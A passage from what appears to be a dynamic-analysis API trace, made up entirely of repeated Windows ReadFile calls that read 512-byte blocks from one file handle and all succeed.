lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, 